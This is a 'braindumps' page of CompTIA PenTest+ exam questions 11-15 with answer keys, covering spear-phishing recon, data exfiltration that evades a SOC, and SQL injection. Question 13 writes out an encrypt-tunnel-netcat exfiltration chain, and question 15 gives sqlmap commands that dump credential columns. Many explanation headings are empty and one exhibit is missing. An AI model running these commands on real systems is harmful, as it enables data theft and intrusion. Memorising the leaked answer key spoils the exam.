Free PT0-003 Exam Braindumps

Pass your CompTIA PenTest+ exam with these free Questions and Answers

Page 4 of 27
QUESTION 11

A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?

  1. A. Shoulder surfing
  2. B. Recon-ng
  3. C. Social media
  4. D. Password dumps

Correct Answer: C
When developing a phishing campaign, the tester should first use social media to gather information about the targets.
✑ Social Media:
✑ Process:
✑ Other Options:
Pentest References:
✑ Spear Phishing: A targeted phishing attack aimed at specific individuals, using personal information to increase the credibility of the email.
✑ OSINT (Open Source Intelligence): Leveraging publicly available information to gather intelligence on targets, including through social media.
By starting with social media, the penetration tester can collect detailed and personalized information about the targets, which is essential for creating an effective spear phishing campaign.
=================

QUESTION 12

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:
[Exhibit: output image not reproduced]
Which of the following targets should the tester select next?

  1. A. fileserver
  2. B. hrdatabase
  3. C. legaldatabase
  4. D. financesite

Correct Answer: A
✑ Evaluation Criteria:
✑ Analysis:
✑ Selection Justification:
Pentest References:
✑ Risk Prioritization: Balancing between severity (CVSS) and exploitability (EPSS) is crucial for effective vulnerability management.
✑ Risk Assessment: Evaluating both the impact and the likelihood of exploitation helps in making informed decisions about testing priorities.
By selecting the fileserver, the penetration tester focuses on a target that is highly likely to be exploited, addressing the most immediate risk based on the given scores.

QUESTION 13

A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?

  1. A. Apply UTF-8 to the data and send over a tunnel to TCP port 25.
  2. B. Apply Base64 to the data and send over a tunnel to TCP port 80.
  3. C. Apply 3DES to the data and send over a tunnel UDP port 53.
  4. D. Apply AES-256 to the data and send over a tunnel to TCP port 443.

Correct Answer: D
AES-256 (Advanced Encryption Standard with a 256-bit key) is a symmetric encryption algorithm widely used for securing data. Sending data over TCP port 443, which is typically used for HTTPS, helps to avoid detection by network monitoring systems as it blends with regular secure web traffic.
✑ Encrypting Data with AES-256:
Step-by-Step Explanation:
openssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin -k secretkey
✑ Setting Up a Secure Tunnel:
ssh -L 443:targetserver:443 user@intermediatehost
✑ Transferring Data Over the Tunnel: cat encrypted.bin | nc localhost 443
(the local end of the ssh -L forward is used so the data actually traverses the tunnel)
✑ Benefits of Using AES-256 and Port 443:
✑ Real-World Example:
✑ References from Pentesting Literature:
✑ Penetration Testing - A Hands-on Introduction to Hacking
✑ HTB Official Writeups
=================

QUESTION 14

A penetration tester needs to help create a threat model of a custom application. Which of the following is the most likely framework the tester will use?

  1. A. MITRE ATT&CK
  2. B. OSSTMM
  3. C. CI/CD
  4. D. DREAD

Correct Answer: D
The DREAD model is a risk assessment framework used to evaluate and prioritize the security risks of an application. It stands for Damage potential, Reproducibility, Exploitability, Affected users, and Discoverability.
✑ Understanding DREAD:
✑ Usage in Threat Modeling:
✑ Process:
✑ References from Pentesting Literature:
✑ Penetration Testing - A Hands-on Introduction to Hacking
✑ HTB Official Writeups
=================

QUESTION 15

During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?

  1. A. sqlmap -u www.example.com/?id=1 --search -T user
  2. B. sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred
  3. C. sqlmap -u www.example.com/?id=1 --tables -D accounts
  4. D. sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

Correct Answer: B
To enumerate password hashes using an SQL injection vulnerability, the penetration tester needs to extract the specific columns from the database that typically contain password hashes. The --dump option in sqlmap dumps the contents of the specified database table (and, with -C, only the named columns). Here's a breakdown of the options:
✑ Option A: sqlmap -u www.example.com/?id=1 --search -T user
✑ Option B: sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred
✑ Option C: sqlmap -u www.example.com/?id=1 --tables -D accounts
✑ Option D: sqlmap -u www.example.com/?id=1 --schema --current-user --current-db
References from Pentest:
✑ Writeup HTB: Demonstrates using sqlmap to dump data from specific tables to retrieve sensitive information, including password hashes.
✑ Luke HTB: Shows the process of exploiting SQL injection to extract user credentials and hashes by dumping specific columns from the database.
=================
